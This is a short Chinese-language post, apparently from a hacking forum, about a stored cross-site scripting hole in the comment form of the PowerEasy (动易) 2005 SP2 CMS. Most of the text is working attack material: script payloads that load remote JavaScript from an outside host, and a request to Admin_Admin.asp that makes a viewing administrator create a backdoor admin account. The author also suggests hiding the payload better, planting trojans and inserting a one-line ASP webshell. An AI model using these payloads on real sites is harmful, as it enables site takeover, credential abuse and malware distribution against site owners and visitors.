测试,动易2005SP2免费版,文章评论有跨站脚本攻击漏洞
具体情况本站正在测试中,没有太大危害,但很惹人烦,目前官方未见补丁,过滤掉script就行了.
测试方式: 可在发表评论的主页及邮件地址处写上:
'><SCRIPT>
alert('动易有新漏洞了怕怕!')
<script>
演示: http://www.hx99.net/News/hack/200601/673.shtml
我们在主页地址上写上如下代码:
'><SCRIPT>window.open ('http://www.hx99.cn/h.swf')</SCRIPT>
可以是
'><script src='http://www.hx99.cn/1.js'></script>
当然这个1.js里你要入什么我就管不着了,如:
<SCRIPT>window.open ('
Admin_Admin.asp?AdminName=yvsm&username=yvsm&Password=yvsm&PwdConfirm=yvsm&Purview=1&AdminPurview_Article=4&arrClass_View_Article=&arrClass_Input_Article=&arrClass_Check_Article=&arrClass_Manage_Article=&AdminPurview_Soft=4&arrClass_View_Soft=&arrClass_Input_Soft=&arrClass_Check_Soft=&arrClass_Manage_Soft=&AdminPurview_Photo=4&arrClass_View_Photo=&arrClass_Input_Photo=&arrClass_Check_Photo=&arrClass_Manage_Photo=&AdminPurview_Shop=4&arrClass_View_Shop=&arrClass_Input_Shop=&arrClass_Check_Shop=&arrClass_Manage_Shop=&AdminPurview_online=4&arrClass_View_online=&arrClass_Input_online=&arrClass_Check_online=&arrClass_Manage_online=&AdminPurview_Others=ModifyPwd&Action=SaveAdd&Submit=+%CC%ED+%BC%D3+
')</SCRIPT>
这样的话当管理员看你的评论时就将前台用户名为YVSM的加为管理员,账号为YVSM 密码YVSM
呵呵,根据地你的情况改了了,
本文只是小小的测试,所以容易让管理员发现,你可以将其改的更隐藏些。。。
小小的BUG就看如何利用了,拿管理员账号?挂马?都是可以做到的,另外要说的是如果你知道他的数据库路径,并且是ASP的话,那么就不得不恭喜你了,插入一个一句话的木马?
呵呵。。。
以上方法只供参考,
欢迎大家来htttp://hx99.net/bbs讨论,http://hx99.cn
您现在的位置: 
